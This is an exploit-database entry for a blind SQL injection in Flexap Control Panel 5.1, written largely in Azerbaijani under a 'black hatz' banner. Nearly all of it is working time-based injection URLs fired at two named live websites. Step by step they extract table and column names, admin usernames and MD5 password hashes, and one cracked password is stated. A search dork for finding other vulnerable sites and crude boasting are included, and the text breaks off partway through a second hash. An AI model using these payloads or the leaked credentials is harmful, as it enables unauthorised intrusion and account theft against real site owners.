Flexap Control Panel 5.1 Blind SQL Injection Vulnerability

2012-09-04T00:00:00
ID 1337DAY-ID-19322
Type zdt
Reporter AkaStep
Modified 2012-09-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
Vulnerable software: Control Panel version 5.1 
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1 
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am

=====================================================


************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************



=====================================================




http://dua.am/cms <=Admin panel

Real exploitation example:

Time Based Always RuleZ!

//TRUE

http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/

cms: http://www.dua.am/



//TRUE

www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5




logini cekek:


http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275

1-ci simvol:


a

//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

 
 
 2-ci simvol: d
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 3-cu simvol:   m
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 4-cu simvol:  d
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
 5-ci simvol:   u
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 6-ci simvol:   a
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 Login:  admdua
 
 
 //TRUE
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
 
 Passi cekmeye getdik!
 
 
 
 Pass deyesen ele budur:D 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 pass: Massword
 
 
 mogin:Massword

===================================================================

Next another Demo:


Adminka: http://mkuzak.am/cms/


//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/



//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/



Developed by <a href="http://www.flexap.am"


Bele olmalidir:




http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


24 table varimizdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


1-ci tablein adi 8 simvolluqdur:


//TRUE

Cekek


1-ci tablein adinin 1ci herfi:   c


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5


2-ci simvolu (1-ci tablein adinin) :   a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5

3-cu simvolu:   t

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



Category?

Yoxlayaq:

1-ci tablein adi: category
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



Ok indi qisaltmaga calisaq metodu:

pattern: adm
user

uzre:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



adm uzre butun neticeler LIMIT offsetlerde hamisi FALSE

qaldi user uzre. Edit: Ele user uzre de netice falsedir butun cehdlerde.


cms uzre axtaraq.


(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


Alinmasa isimiz uzanir.




ele uzandida isimiz icini sikim!



2-ci table name:   6 simvol uzunluqludur:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


Cekek bu sikilmisi de.


1-ci simvolu: c

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5

2-ci simvolu: o

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


config?

2ci table name config:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5



=======================================================================
3-cu table name:   3 simvol:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5

1-ci simvolu:   f


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5



2-ci simvolu:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3-cu simvolu:  q

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3-cu table name: faq

======================================================================


4-cu table name: 15 simvol uzunluqludur:




http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


1-ci simvolu: f

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5

2-ci simvolu:


a

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


sikdirecek  bu table
=======================================================================


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

u herfine nese verir.


10 simvolludur:


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


1-ci simvolu: u

2-ci simvolu: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

3-cu simvolu: i

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

4-cu simvol:  s

s

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


5-ci simvolu:  t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

6-ci simvol: _

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

7-ci simvol:  t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


8-ci simvol:  y

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

9-cu simvol: p

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

10-ci simvol:

table_name:  ulist_type

===================================================================================================================
novbeti table:
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD  5='5

Bu da
//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD  5='5



Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD  5='5


Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5



============================= birinci herfi u olmaqla cemi 5 simvoldan ibaretdir. May be users?======================

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


2-ci herfi: l

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


TABLE_NAME ulist

0x756C697374




http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD  5='5



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD  5='5

Ola bilsin ele budur cms-in adminkasina girmek ucun table
2 yazi var orda

COlumnlarina baxaq gorek ne veziyyetdedir.



http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

ulist tableinda 8 column var:

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

1-ci column name: 8 simvoldan ibaretdir

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

ulist tableinda 1-ci colum namein 1-ci simvolu:  u

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

2-ci simvolu:  l

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


3-cu simvolu:  i


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


4-cu simvolu:  s

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

5-ci simvolu:    t

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

6-ci simvol:   _


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


1-ci column name full sekilde:

ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


column prefix ulist_     dir demeli:


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


Getdik bu sikilmis 2-ci columnu cekmeye:

name Uzunlugu 13 simvoldur:


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5



http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


hal hazirda bu sekildedir:

ulist_t



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5

hal hazirda bu sekildedir:

ulist_typeXXX


axira getmirem imho sikdirmelidir bu column name

Novbeti column blyaaaaaaaaaaaaaaaaaaaaaa:(



============================================

3-cu column:

10 simvoldur name length
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_n



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_na



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_nam






http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


ulist_name


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


==============================================================


Novbeti column:

11 simvolludur column name length

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5


Prefixi: ulist_      (-6)

Offset 7 den baslanmalidir substr()-de


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5

ulist_login



password-da cixsa sikmeye basliyardiq blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:(



Deyesen artiq duz tutmusam bunu:


http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5

Yeah!

Sikdik!

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5


ulist_password


Neyimiz var:

ulist table-i

hemin tableda:

ulist_login
ulist_password

columnlari


Basliyaq...




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD  5='5



select length(`ulist_login`) from ulist limit 1


1-ci login name 9 simvoldan ibaretdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


--------------------------------------------------------------------------------------------------------------------------------------------------------------
Loginin 1-ci simvolu:  a

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5



2ci simvolu:   d

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5

3cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

4-cu simvol:   m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

5-ci simvol:


Login bu ola biler: admmkuzak


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD  5='5





Getdik passi firlatmaga...


Amma 1-ci sifrelenme algosunu yoxlayaq.

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5


//TRUE


MD5 SIFRELENME ALGOSU:

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5




admmkuzak adli soska xacikin parolu:


================================================

1-ci simvol: 9


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

2-ci simvol:    5


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

3-cu simvol:   7


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

4-cu simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

5-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

6-ci simvol:    5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

7-ci simvol:   a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


8-ci simvol:  a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

9-cu simvol:   4


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

10-cu simvol:  2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

11-ci simvol:   7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

12-ci simvol:   b (yoxla sonra)

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

13-cu simvol:    0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

14-cu simvol:   7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

15-ci simvol:   b  (yoxla sonra)


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

16-ci simvol:   d

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


17-ci simvol:     d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


18-ci simvol:    3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


19-cu simvol:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


20-ci simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

21-ci simvol:     5

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================
yoxla sonra
22-ci simvol:    4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


23-cu simvol:   9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
yoxla sonra


24-cu simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

25-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


26-ci simvol:    2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

27-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================
yoxla sonra
28-ci simvol:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

29-cu simvol:   4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

30-cu simvol:  e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


31-ci simvol:     3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

32-ci simvol:       1


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
Login:  admmkuzak

MD5 HASH:   9578f5aa427b07bdd3a8549f929a4e31


PASS: Massword
Yoxlaya hashi:

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5


Blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  http://www.mkuzak.am/cms/ de deyir parol sehvdir:(


Belke role yoxdur bu userde?


2-ci user de olmalidir bu table da.


Variant yoxdur cekek:*(




Ikinci user name ucun:


http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




2-ci userin logininin

1-ci herfi:


m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


2-ci herfi:  o


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


3-cu herfi:   g

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


4-cu herfi:     i


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



5-ci simvol: n



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



umumi username ikinci user ucun:


mogin

Yoxlayaq?


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




Passi getdik: Cekmeye yene blyaaaaaaaaaaaaaaaaa :*(


================================================

1-ci simvol:   e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

2-ci simvol:      7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================
yoxla sonra:
3-cu simvol:    9



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

4-cu simvol:       d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

5-ci simvol:   2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================


yoxla mutlwq
6-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================





7-ci simvol:    3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5





================================================
yoxla sonra

8-ci simvol:  1

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================


9-cu simvol:   5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================
10-cu simvol:    e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

11-ci simvol:     9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

12-ci simvol:     9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

13-cu simvol:  c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

14-cu simvol:   a


